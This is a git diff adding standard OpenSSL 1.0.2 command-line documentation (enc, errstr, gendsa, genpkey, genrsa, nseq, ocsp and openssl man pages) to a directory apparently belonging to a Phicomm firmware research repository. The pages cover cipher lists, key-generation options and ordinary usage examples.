+ idea-cfb           IDEA in CFB mode
+ idea-ecb           IDEA in ECB mode
+ idea-ofb           IDEA in OFB mode
+
+ rc2-cbc            128 bit RC2 in CBC mode
+ rc2                Alias for rc2-cbc
+ rc2-cfb            128 bit RC2 in CFB mode
+ rc2-ecb            128 bit RC2 in ECB mode
+ rc2-ofb            128 bit RC2 in OFB mode
+ rc2-64-cbc         64 bit RC2 in CBC mode
+ rc2-40-cbc         40 bit RC2 in CBC mode
+
+ rc4                128 bit RC4
+ rc4-64             64 bit RC4
+ rc4-40             40 bit RC4
+
+ rc5-cbc            RC5 cipher in CBC mode
+ rc5                Alias for rc5-cbc
+ rc5-cfb            RC5 cipher in CFB mode
+ rc5-ecb            RC5 cipher in ECB mode
+ rc5-ofb            RC5 cipher in OFB mode
+
+ aes-[128|192|256]-cbc	128/192/256 bit AES in CBC mode
+ aes-[128|192|256]	Alias for aes-[128|192|256]-cbc
+ aes-[128|192|256]-cfb	128/192/256 bit AES in 128 bit CFB mode
+ aes-[128|192|256]-cfb1	128/192/256 bit AES in 1 bit CFB mode
+ aes-[128|192|256]-cfb8	128/192/256 bit AES in 8 bit CFB mode
+ aes-[128|192|256]-ecb	128/192/256 bit AES in ECB mode
+ aes-[128|192|256]-ofb	128/192/256 bit AES in OFB mode
+
+=head1 EXAMPLES
+
+Just base64 encode a binary file:
+
+ openssl base64 -in file.bin -out file.b64
+
+Decode the same file
+
+ openssl base64 -d -in file.b64 -out file.bin 
+
+Encrypt a file using triple DES in CBC mode using a prompted password:
+
+ openssl des3 -salt -in file.txt -out file.des3 
+
+Decrypt a file using a supplied password:
+
+ openssl des3 -d -salt -in file.des3 -out file.txt -k mypassword
+
+Encrypt a file then base64 encode it (so it can be sent via mail for example)
+using Blowfish in CBC mode:
+
+ openssl bf -a -salt -in file.txt -out file.bf
+
+Base64 decode a file then decrypt it:
+
+ openssl bf -d -salt -a -in file.bf -out file.txt
+
+Decrypt some data using a supplied 40 bit RC4 key:
+
+ openssl rc4-40 -in file.rc4 -out file.txt -K 0102030405
+
+=head1 BUGS
+
+The B<-A> option when used with large files doesn't work properly.
+
+There should be an option to allow an iteration count to be included.
+
+The B<enc> program only supports a fixed number of algorithms with
+certain parameters. So if, for example, you want to use RC2 with a
+76 bit key or RC4 with an 84 bit key you can't use this program.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/errstr.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/errstr.pod
new file mode 100644
index 0000000..b3c6ccf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/errstr.pod
@@ -0,0 +1,39 @@
+=pod
+
+=head1 NAME
+
+errstr - lookup error codes
+
+=head1 SYNOPSIS
+
+B<openssl errstr error_code>
+
+=head1 DESCRIPTION
+
+Sometimes an application will not load error message and only
+numerical forms will be available. The B<errstr> utility can be used to 
+display the meaning of the hex code. The hex code is the hex digits after the
+second colon.
+
+=head1 EXAMPLE
+
+The error code:
+
+ 27594:error:2006D080:lib(32):func(109):reason(128):bss_file.c:107:
+
+can be displayed with:
+ 
+ openssl errstr 2006D080
+
+to produce the error message:
+
+ error:2006D080:BIO routines:BIO_new_file:no such file
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>,
+L<ERR_load_crypto_strings(3)|ERR_load_crypto_strings(3)>,
+L<SSL_load_error_strings(3)|SSL_load_error_strings(3)>
+
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/gendsa.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/gendsa.pod
new file mode 100644
index 0000000..d9f56be
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/gendsa.pod
@@ -0,0 +1,72 @@
+=pod
+
+=head1 NAME
+
+gendsa - generate a DSA private key from a set of parameters
+
+=head1 SYNOPSIS
+
+B<openssl> B<gendsa>
+[B<-out filename>]
+[B<-aes128>]
+[B<-aes192>]
+[B<-aes256>]
+[B<-camellia128>]
+[B<-camellia192>]
+[B<-camellia256>]
+[B<-des>]
+[B<-des3>]
+[B<-idea>]
+[B<-rand file(s)>]
+[B<-engine id>]
+[B<paramfile>]
+
+=head1 DESCRIPTION
+
+The B<gendsa> command generates a DSA private key from a DSA parameter file
+(which will be typically generated by the B<openssl dsaparam> command).
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-aes128|-aes192|-aes256|-camellia128|-camellia192|-camellia256|-des|-des3|-idea>
+
+These options encrypt the private key with specified
+cipher before outputting it. A pass phrase is prompted for.
+If none of these options is specified no encryption is used.
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<gendsa>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=item B<paramfile>
+
+This option specifies the DSA parameter file to use. The parameters in this
+file determine the size of the private key. DSA parameters can be generated
+and examined using the B<openssl dsaparam> command.
+
+=back
+
+=head1 NOTES
+
+DSA key generation is little more than random number generation so it is
+much quicker that RSA key generation for example.
+
+=head1 SEE ALSO
+
+L<dsaparam(1)|dsaparam(1)>, L<dsa(1)|dsa(1)>, L<genrsa(1)|genrsa(1)>,
+L<rsa(1)|rsa(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/genpkey.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/genpkey.pod
new file mode 100644
index 0000000..929edcd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/genpkey.pod
@@ -0,0 +1,228 @@
+=pod
+
+=head1 NAME
+
+genpkey - generate a private key
+
+=head1 SYNOPSIS
+
+B<openssl> B<genpkey>
+[B<-out filename>]
+[B<-outform PEM|DER>]
+[B<-pass arg>]
+[B<-cipher>]
+[B<-engine id>]
+[B<-paramfile file>]
+[B<-algorithm alg>]
+[B<-pkeyopt opt:value>]
+[B<-genparam>]
+[B<-text>]
+
+=head1 DESCRIPTION
+
+The B<genpkey> command generates a private key.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-out filename>
+
+the output filename. If this argument is not specified then standard output is
+used.  
+
+=item B<-outform DER|PEM>
+
+This specifies the output format DER or PEM.
+
+=item B<-pass arg>
+
+the output file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-cipher>
+
+This option encrypts the private key with the supplied cipher. Any algorithm
+name accepted by EVP_get_cipherbyname() is acceptable such as B<des3>.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<genpkey>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms. If used this option should precede all other
+options.
+
+=item B<-algorithm alg>
+
+public key algorithm to use such as RSA, DSA or DH. If used this option must
+precede any B<-pkeyopt> options. The options B<-paramfile> and B<-algorithm>
+are mutually exclusive.
+
+=item B<-pkeyopt opt:value>
+
+set the public key algorithm option B<opt> to B<value>. The precise set of
+options supported depends on the public key algorithm used and its
+implementation. See B<KEY GENERATION OPTIONS> below for more details.
+
+=item B<-genparam>
+
+generate a set of parameters instead of a private key. If used this option must
+precede and B<-algorithm>, B<-paramfile> or B<-pkeyopt> options.
+
+=item B<-paramfile filename>
+
+Some public key algorithms generate a private key based on a set of parameters.
+They can be supplied using this option. If this option is used the public key
+algorithm used is determined by the parameters. If used this option must
+precede and B<-pkeyopt> options. The options B<-paramfile> and B<-algorithm>
+are mutually exclusive.
+
+=item B<-text>
+
+Print an (unencrypted) text representation of private and public keys and
+parameters along with the PEM or DER structure.
+
+=back
+
+=head1 KEY GENERATION OPTIONS
+
+The options supported by each algorith and indeed each implementation of an
+algorithm can vary. The options for the OpenSSL implementations are detailed
+below.
+
+=head1 RSA KEY GENERATION OPTIONS
+
+=over 4
+
+=item B<rsa_keygen_bits:numbits>
+
+The number of bits in the generated key. If not specified 1024 is used.
+
+=item B<rsa_keygen_pubexp:value>
+
+The RSA public exponent value. This can be a large decimal or
+hexadecimal value if preceded by B<0x>. Default value is 65537.
+
+=back
+
+=head1 DSA PARAMETER GENERATION OPTIONS
+
+=over 4
+
+=item B<dsa_paramgen_bits:numbits>
+
+The number of bits in the generated parameters. If not specified 1024 is used.
+
+=back
+
+=head1 DH PARAMETER GENERATION OPTIONS
+
+=over 4
+
+=item B<dh_paramgen_prime_len:numbits>
+
+The number of bits in the prime parameter B<p>.
+
+=item B<dh_paramgen_generator:value>
+
+The value to use for the generator B<g>.
+
+=item B<dh_rfc5114:num>
+
+If this option is set then the appropriate RFC5114 parameters are used
+instead of generating new parameters. The value B<num> can take the
+values 1, 2 or 3 corresponding to RFC5114 DH parameters consisting of
+1024 bit group with 160 bit subgroup, 2048 bit group with 224 bit subgroup
+and 2048 bit group with 256 bit subgroup as mentioned in RFC5114 sections
+2.1, 2.2 and 2.3 respectively.
+
+=back
+
+=head1 EC PARAMETER GENERATION OPTIONS
+
+=over 4
+
+=item B<ec_paramgen_curve:curve>
+
+the EC curve to use.
+
+=back
+
+=head1 GOST2001 KEY GENERATION AND PARAMETER OPTIONS
+
+Gost 2001 support is not enabled by default. To enable this algorithm,
+one should load the ccgost engine in the OpenSSL configuration file.
+See README.gost file in the engines/ccgost directiry of the source
+distribution for more details.
+
+Use of a parameter file for the GOST R 34.10 algorithm is optional.
+Parameters can be specified during key generation directly as well as
+during generation of parameter file.
+
+=over 4
+
+=item B<paramset:name>
+
+Specifies GOST R 34.10-2001 parameter set according to RFC 4357.
+Parameter set can be specified using abbreviated name, object short name or
+numeric OID. Following parameter sets are supported:
+
+  paramset   OID               Usage
+  A          1.2.643.2.2.35.1  Signature
+  B          1.2.643.2.2.35.2  Signature
+  C          1.2.643.2.2.35.3  Signature
+  XA         1.2.643.2.2.36.0  Key exchange
+  XB         1.2.643.2.2.36.1  Key exchange
+  test       1.2.643.2.2.35.0  Test purposes
+
+=back
+
+
+
+=head1 NOTES
+
+The use of the genpkey program is encouraged over the algorithm specific
+utilities because additional algorithm options and ENGINE provided algorithms
+can be used.
+
+=head1 EXAMPLES
+
+Generate an RSA private key using default parameters:
+
+ openssl genpkey -algorithm RSA -out key.pem 
+
+Encrypt output private key using 128 bit AES and the passphrase "hello":
+
+ openssl genpkey -algorithm RSA -out key.pem -aes-128-cbc -pass pass:hello
+
+Generate a 2048 bit RSA key using 3 as the public exponent:
+
+ openssl genpkey -algorithm RSA -out key.pem -pkeyopt rsa_keygen_bits:2048 \
+ 						-pkeyopt rsa_keygen_pubexp:3
+
+Generate 1024 bit DSA parameters:
+
+ openssl genpkey -genparam -algorithm DSA -out dsap.pem \
+						-pkeyopt dsa_paramgen_bits:1024
+
+Generate DSA key from parameters:
+
+ openssl genpkey -paramfile dsap.pem -out dsakey.pem 
+
+Generate 1024 bit DH parameters:
+
+ openssl genpkey -genparam -algorithm DH -out dhp.pem \
+					-pkeyopt dh_paramgen_prime_len:1024
+
+Output RFC5114 2048 bit DH parameters with 224 bit subgroup:
+
+ openssl genpkey -genparam -algorithm DH -out dhp.pem -pkeyopt dh_rfc5114:2
+
+Generate DH key from parameters:
+
+ openssl genpkey -paramfile dhp.pem -out dhkey.pem 
+
+
+=cut
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/genrsa.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/genrsa.pod
new file mode 100644
index 0000000..cb03d09
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/genrsa.pod
@@ -0,0 +1,108 @@
+=pod
+
+=head1 NAME
+
+genrsa - generate an RSA private key
+
+=head1 SYNOPSIS
+
+B<openssl> B<genrsa>
+[B<-out filename>]
+[B<-passout arg>]
+[B<-aes128>]
+[B<-aes128>]
+[B<-aes192>]
+[B<-aes256>]
+[B<-camellia128>]
+[B<-camellia192>]
+[B<-camellia256>]
+[B<-aes192>]
+[B<-aes256>]
+[B<-camellia128>]
+[B<-camellia192>]
+[B<-camellia256>]
+[B<-des>]
+[B<-des3>]
+[B<-idea>]
+[B<-f4>]
+[B<-3>]
+[B<-rand file(s)>]
+[B<-engine id>]
+[B<numbits>]
+
+=head1 DESCRIPTION
+
+The B<genrsa> command generates an RSA private key.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-out filename>
+
+the output filename. If this argument is not specified then standard output is
+used.  
+
+=item B<-passout arg>
+
+the output file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-aes128|-aes192|-aes256|-camellia128|-camellia192|-camellia256|-des|-des3|-idea>
+
+These options encrypt the private key with specified
+cipher before outputting it. If none of these options is
+specified no encryption is used. If encryption is used a pass phrase is prompted
+for if it is not supplied via the B<-passout> argument.
+
+=item B<-F4|-3>
+
+the public exponent to use, either 65537 or 3. The default is 65537.
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<genrsa>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=item B<numbits>
+
+the size of the private key to generate in bits. This must be the last option
+specified. The default is 512.
+
+=back
+
+=head1 NOTES
+
+RSA private key generation essentially involves the generation of two prime
+numbers. When generating a private key various symbols will be output to
+indicate the progress of the generation. A B<.> represents each number which
+has passed an initial sieve test, B<+> means a number has passed a single
+round of the Miller-Rabin primality test. A newline means that the number has
+passed all the prime tests (the actual number depends on the key size).
+
+Because key generation is a random process the time taken to generate a key
+may vary somewhat.
+
+=head1 BUGS
+
+A quirk of the prime generation algorithm is that it cannot generate small
+primes. Therefore the number of bits should not be less that 64. For typical
+private keys this will not matter because for security reasons they will
+be much larger (typically 1024 bits).
+
+=head1 SEE ALSO
+
+L<gendsa(1)|gendsa(1)>
+
+=cut
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/nseq.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/nseq.pod
new file mode 100644
index 0000000..989c310
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/nseq.pod
@@ -0,0 +1,70 @@
+=pod
+
+=head1 NAME
+
+nseq - create or examine a netscape certificate sequence
+
+=head1 SYNOPSIS
+
+B<openssl> B<nseq>
+[B<-in filename>]
+[B<-out filename>]
+[B<-toseq>]
+
+=head1 DESCRIPTION
+
+The B<nseq> command takes a file containing a Netscape certificate
+sequence and prints out the certificates contained in it or takes a
+file of certificates and converts it into a Netscape certificate
+sequence.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-in filename>
+
+This specifies the input filename to read or standard input if this
+option is not specified.
+
+=item B<-out filename>
+
+specifies the output filename or standard output by default.
+
+=item B<-toseq>
+
+normally a Netscape certificate sequence will be input and the output
+is the certificates contained in it. With the B<-toseq> option the
+situation is reversed: a Netscape certificate sequence is created from
+a file of certificates.
+
+=back
+
+=head1 EXAMPLES
+
+Output the certificates in a Netscape certificate sequence
+
+ openssl nseq -in nseq.pem -out certs.pem
+
+Create a Netscape certificate sequence
+
+ openssl nseq -in certs.pem -toseq -out nseq.pem
+
+=head1 NOTES
+
+The B<PEM> encoded form uses the same headers and footers as a certificate:
+
+ -----BEGIN CERTIFICATE-----
+ -----END CERTIFICATE-----
+
+A Netscape certificate sequence is a Netscape specific form that can be sent
+to browsers as an alternative to the standard PKCS#7 format when several
+certificates are sent to the browser: for example during certificate enrollment.
+It is used by Netscape certificate server for example.
+
+=head1 BUGS
+
+This program needs a few more options: like allowing DER or PEM input and
+output files and allowing multiple certificate files to be used.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ocsp.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ocsp.pod
new file mode 100644
index 0000000..38f026a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ocsp.pod
@@ -0,0 +1,375 @@
+=pod
+
+=head1 NAME
+
+ocsp - Online Certificate Status Protocol utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<ocsp>
+[B<-out file>]
+[B<-issuer file>]
+[B<-cert file>]
+[B<-serial n>]
+[B<-signer file>]
+[B<-signkey file>]
+[B<-sign_other file>]
+[B<-no_certs>]
+[B<-req_text>]
+[B<-resp_text>]
+[B<-text>]
+[B<-reqout file>]
+[B<-respout file>]
+[B<-reqin file>]
+[B<-respin file>]
+[B<-nonce>]
+[B<-no_nonce>]
+[B<-url URL>]
+[B<-host host:n>]
+[B<-path>]
+[B<-CApath dir>]
+[B<-CAfile file>]
+[B<-VAfile file>]
+[B<-validity_period n>]
+[B<-status_age n>]
+[B<-noverify>]
+[B<-verify_other file>]
+[B<-trust_other>]
+[B<-no_intern>]
+[B<-no_signature_verify>]
+[B<-no_cert_verify>]
+[B<-no_chain>]
+[B<-no_cert_checks>]
+[B<-port num>]
+[B<-index file>]
+[B<-CA file>]
+[B<-rsigner file>]
+[B<-rkey file>]
+[B<-rother file>]
+[B<-resp_no_certs>]
+[B<-nmin n>]
+[B<-ndays n>]
+[B<-resp_key_id>]
+[B<-nrequest n>]
+[B<-md5|-sha1|...>]
+
+=head1 DESCRIPTION
+
+The Online Certificate Status Protocol (OCSP) enables applications to
+determine the (revocation) state of an identified certificate (RFC 2560).
+
+The B<ocsp> command performs many common OCSP tasks. It can be used
+to print out requests and responses, create requests and send queries
+to an OCSP responder and behave like a mini OCSP server itself.
+
+=head1 OCSP CLIENT OPTIONS
+
+=over 4
+
+=item B<-out filename>
+
+specify output filename, default is standard output.
+
+=item B<-issuer filename>
+
+This specifies the current issuer certificate. This option can be used
+multiple times. The certificate specified in B<filename> must be in
+PEM format. This option B<MUST> come before any B<-cert> options.
+
+=item B<-cert filename>
+
+Add the certificate B<filename> to the request. The issuer certificate
+is taken from the previous B<issuer> option, or an error occurs if no
+issuer certificate is specified.
+
+=item B<-serial num>
+
+Same as the B<cert> option except the certificate with serial number
+B<num> is added to the request. The serial number is interpreted as a
+decimal integer unless preceded by B<0x>. Negative integers can also
+be specified by preceding the value by a B<-> sign.
+
+=item B<-signer filename>, B<-signkey filename>
+
+Sign the OCSP request using the certificate specified in the B<signer>
+option and the private key specified by the B<signkey> option. If
+the B<signkey> option is not present then the private key is read
+from the same file as the certificate. If neither option is specified then
+the OCSP request is not signed.
+
+=item B<-sign_other filename>
+
+Additional certificates to include in the signed request.
+
+=item B<-nonce>, B<-no_nonce>
+
+Add an OCSP nonce extension to a request or disable OCSP nonce addition.
+Normally if an OCSP request is input using the B<respin> option no
+nonce is added: using the B<nonce> option will force addition of a nonce.
+If an OCSP request is being created (using B<cert> and B<serial> options)
+a nonce is automatically added specifying B<no_nonce> overrides this.
+
+=item B<-req_text>, B<-resp_text>, B<-text>
+
+print out the text form of the OCSP request, response or both respectively.
+
+=item B<-reqout file>, B<-respout file>
+
+write out the DER encoded certificate request or response to B<file>.
+
+=item B<-reqin file>, B<-respin file>
+
+read OCSP request or response file from B<file>. These option are ignored
+if OCSP request or response creation is implied by other options (for example
+with B<serial>, B<cert> and B<host> options).
+
+=item B<-url responder_url>
+
+specify the responder URL. Both HTTP and HTTPS (SSL/TLS) URLs can be specified.
+
+=item B<-host hostname:port>, B<-path pathname>
+
+if the B<host> option is present then the OCSP request is sent to the host
+B<hostname> on port B<port>. B<path> specifies the HTTP path name to use
+or "/" by default.
+
+=item B<-timeout seconds>
+
+connection timeout to the OCSP responder in seconds
+
+=item B<-CAfile file>, B<-CApath pathname>
+
+file or pathname containing trusted CA certificates. These are used to verify
+the signature on the OCSP response.
+
+=item B<-verify_other file>
+
+file containing additional certificates to search when attempting to locate
+the OCSP response signing certificate. Some responders omit the actual signer's
+certificate from the response: this option can be used to supply the necessary
+certificate in such cases.
+
+=item B<-trust_other>
+
+the certificates specified by the B<-verify_other> option should be explicitly
+trusted and no additional checks will be performed on them. This is useful
+when the complete responder certificate chain is not available or trusting a
+root CA is not appropriate.
+
+=item B<-VAfile file>
+
+file containing explicitly trusted responder certificates. Equivalent to the
+B<-verify_other> and B<-trust_other> options.
+
+=item B<-noverify>
+
+don't attempt to verify the OCSP response signature or the nonce values. This
+option will normally only be used for debugging since it disables all verification
+of the responders certificate.
+
+=item B<-no_intern>
+
+ignore certificates contained in the OCSP response when searching for the
+signers certificate. With this option the signers certificate must be specified
+with either the B<-verify_other> or B<-VAfile> options.
+
+=item B<-no_signature_verify>
+
+don't check the signature on the OCSP response. Since this option tolerates invalid
+signatures on OCSP responses it will normally only be used for testing purposes.
+
+=item B<-no_cert_verify>
+
+don't verify the OCSP response signers certificate at all. Since this option allows
+the OCSP response to be signed by any certificate it should only be used for
+testing purposes.
+
+=item B<-no_chain>
+
+do not use certificates in the response as additional untrusted CA
+certificates.
+
+=item B<-no_cert_checks>
+
+don't perform any additional checks on the OCSP response signers certificate.
+That is do not make any checks to see if the signers certificate is authorised
+to provide the necessary status information: as a result this option should
+only be used for testing purposes.
+
+=item B<-validity_period nsec>, B<-status_age age>
+
+these options specify the range of times, in seconds, which will be tolerated
+in an OCSP response. Each certificate status response includes a B<notBefore> time and
+an optional B<notAfter> time. The current time should fall between these two values, but
+the interval between the two times may be only a few seconds. In practice the OCSP
+responder and clients clocks may not be precisely synchronised and so such a check
+may fail. To avoid this the B<-validity_period> option can be used to specify an
+acceptable error range in seconds, the default value is 5 minutes.
+
+If the B<notAfter> time is omitted from a response then this means that new status
+information is immediately available. In this case the age of the B<notBefore> field
+is checked to see it is not older than B<age> seconds old. By default this additional
+check is not performed.
+
+=item B<-md5|-sha1|-sha256|-ripemod160|...>
+
+this option sets digest algorithm to use for certificate identification
+in the OCSP request. By default SHA-1 is used. 
+
+=back
+
+=head1 OCSP SERVER OPTIONS
+
+=over 4
+
+=item B<-index indexfile>
+
+B<indexfile> is a text index file in B<ca> format containing certificate revocation
+information.
+
+If the B<index> option is specified the B<ocsp> utility is in responder mode, otherwise
+it is in client mode. The request(s) the responder processes can be either specified on
+the command line (using B<issuer> and B<serial> options), supplied in a file (using the
+B<respin> option) or via external OCSP clients (if B<port> or B<url> is specified).
+
+If the B<index> option is present then the B<CA> and B<rsigner> options must also be
+present.
+
+=item B<-CA file>
+
+CA certificate corresponding to the revocation information in B<indexfile>.
+
+=item B<-rsigner file>
+
+The certificate to sign OCSP responses with.
+
+=item B<-rother file>
+
+Additional certificates to include in the OCSP response.
+
+=item B<-resp_no_certs>
+
+Don't include any certificates in the OCSP response.
+
+=item B<-resp_key_id>
+
+Identify the signer certificate using the key ID, default is to use the subject name.
+
+=item B<-rkey file>
+
+The private key to sign OCSP responses with: if not present the file specified in the
+B<rsigner> option is used.
+
+=item B<-port portnum>
+
+Port to listen for OCSP requests on. The port may also be specified using the B<url>
+option.
+
+=item B<-nrequest number>
+
+The OCSP server will exit after receiving B<number> requests, default unlimited. 
+
+=item B<-nmin minutes>, B<-ndays days>
+
+Number of minutes or days when fresh revocation information is available: used in the
+B<nextUpdate> field. If neither option is present then the B<nextUpdate> field is 
+omitted meaning fresh revocation information is immediately available.
+
+=back
+
+=head1 OCSP Response verification.
+
+OCSP Response follows the rules specified in RFC2560.
+
+Initially the OCSP responder certificate is located and the signature on
+the OCSP request checked using the responder certificate's public key.
+
+Then a normal certificate verify is performed on the OCSP responder certificate
+building up a certificate chain in the process. The locations of the trusted
+certificates used to build the chain can be specified by the B<CAfile>
+and B<CApath> options or they will be looked for in the standard OpenSSL
+certificates directory.
+
+If the initial verify fails then the OCSP verify process halts with an
+error.
+
+Otherwise the issuing CA certificate in the request is compared to the OCSP
+responder certificate: if there is a match then the OCSP verify succeeds.
+
+Otherwise the OCSP responder certificate's CA is checked against the issuing
+CA certificate in the request. If there is a match and the OCSPSigning
+extended key usage is present in the OCSP responder certificate then the
+OCSP verify succeeds.
+
+Otherwise the root CA of the OCSP responders CA is checked to see if it
+is trusted for OCSP signing. If it is the OCSP verify succeeds.
+
+If none of these checks is successful then the OCSP verify fails.
+
+What this effectively means if that if the OCSP responder certificate is
+authorised directly by the CA it is issuing revocation information about
+(and it is correctly configured) then verification will succeed.
+
+If the OCSP responder is a "global responder" which can give details about
+multiple CAs and has its own separate certificate chain then its root
+CA can be trusted for OCSP signing. For example:
+
+ openssl x509 -in ocspCA.pem -addtrust OCSPSigning -out trustedCA.pem
+
+Alternatively the responder certificate itself can be explicitly trusted
+with the B<-VAfile> option.
+
+=head1 NOTES
+
+As noted, most of the verify options are for testing or debugging purposes.
+Normally only the B<-CApath>, B<-CAfile> and (if the responder is a 'global
+VA') B<-VAfile> options need to be used.
+
+The OCSP server is only useful for test and demonstration purposes: it is
+not really usable as a full OCSP responder. It contains only a very
+simple HTTP request handling and can only handle the POST form of OCSP
+queries. It also handles requests serially meaning it cannot respond to
+new requests until it has processed the current one. The text index file
+format of revocation is also inefficient for large quantities of revocation
+data.
+
+It is possible to run the B<ocsp> application in responder mode via a CGI
+script using the B<respin> and B<respout> options.
+
+=head1 EXAMPLES
+
+Create an OCSP request and write it to a file:
+
+ openssl ocsp -issuer issuer.pem -cert c1.pem -cert c2.pem -reqout req.der
+
+Send a query to an OCSP responder with URL http://ocsp.myhost.com/ save the 
+response to a file and print it out in text form
+
+ openssl ocsp -issuer issuer.pem -cert c1.pem -cert c2.pem \
+     -url http://ocsp.myhost.com/ -resp_text -respout resp.der
+
+Read in an OCSP response and print out text form:
+
+ openssl ocsp -respin resp.der -text
+
+OCSP server on port 8888 using a standard B<ca> configuration, and a separate
+responder certificate. All requests and responses are printed to a file.
+
+ openssl ocsp -index demoCA/index.txt -port 8888 -rsigner rcert.pem -CA demoCA/cacert.pem
+	-text -out log.txt
+
+As above but exit after processing one request:
+
+ openssl ocsp -index demoCA/index.txt -port 8888 -rsigner rcert.pem -CA demoCA/cacert.pem
+     -nrequest 1
+
+Query status information using internally generated request:
+
+ openssl ocsp -index demoCA/index.txt -rsigner rcert.pem -CA demoCA/cacert.pem
+     -issuer demoCA/cacert.pem -serial 1
+
+Query status information using request read from a file, write response to a
+second file.
+
+ openssl ocsp -index demoCA/index.txt -rsigner rcert.pem -CA demoCA/cacert.pem
+     -reqin req.der -respout resp.der
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/openssl.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/openssl.pod
new file mode 100644
index 0000000..64a160c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/openssl.pod
@@ -0,0 +1,422 @@
+
+=pod
+
+=head1 NAME
+
+openssl - OpenSSL command line tool
+
+=head1 SYNOPSIS
+
+B<openssl>
+I<command>
+[ I<command_opts> ]
+[ I<command_args> ]
+
+B<openssl> [ B<list-standard-commands> | B<list-message-digest-commands> | B<list-cipher-commands> | B<list-cipher-algorithms> | B<list-message-digest-algorithms> | B<list-public-key-algorithms>]
+
+B<openssl> B<no->I<XXX> [ I<arbitrary options> ]
+
+=head1 DESCRIPTION
+
+OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL
+v2/v3) and Transport Layer Security (TLS v1) network protocols and related
+cryptography standards required by them.
+
+The B<openssl> program is a command line tool for using the various
+cryptography functions of OpenSSL's B<crypto> library from the shell. 
+It can be used for 
+
+ o  Creation and management of private keys, public keys and parameters
+ o  Public key cryptographic operations
+ o  Creation of X.509 certificates, CSRs and CRLs 
+ o  Calculation of Message Digests
+ o  Encryption and Decryption with Ciphers
+ o  SSL/TLS Client and Server Tests
+ o  Handling of S/MIME signed or encrypted mail
+ o  Time Stamp requests, generation and verification
+
+=head1 COMMAND SUMMARY
+
+The B<openssl> program provides a rich variety of commands (I<command> in the
+SYNOPSIS above), each of which often has a wealth of options and arguments
+(I<command_opts> and I<command_args> in the SYNOPSIS).
+
+The pseudo-commands B<list-standard-commands>, B<list-message-digest-commands>,
+and B<list-cipher-commands> output a list (one entry per line) of the names
+of all standard commands, message digest commands, or cipher commands,
+respectively, that are available in the present B<openssl> utility.
+
+The pseudo-commands B<list-cipher-algorithms> and
+B<list-message-digest-algorithms> list all cipher and message digest names, one entry per line. Aliases are listed as:
+
+ from => to
+
+The pseudo-command B<list-public-key-algorithms> lists all supported public
+key algorithms.
+
+The pseudo-command B<no->I<XXX> tests whether a command of the
+specified name is available.  If no command named I<XXX> exists, it
+returns 0 (success) and prints B<no->I<XXX>; otherwise it returns 1
+and prints I<XXX>.  In both cases, the output goes to B<stdout> and
+nothing is printed to B<stderr>.  Additional command line arguments
+are always ignored.  Since for each cipher there is a command of the
+same name, this provides an easy way for shell scripts to test for the
+availability of ciphers in the B<openssl> program.  (B<no->I<XXX> is
+not able to detect pseudo-commands such as B<quit>,
+B<list->I<...>B<-commands>, or B<no->I<XXX> itself.)
+
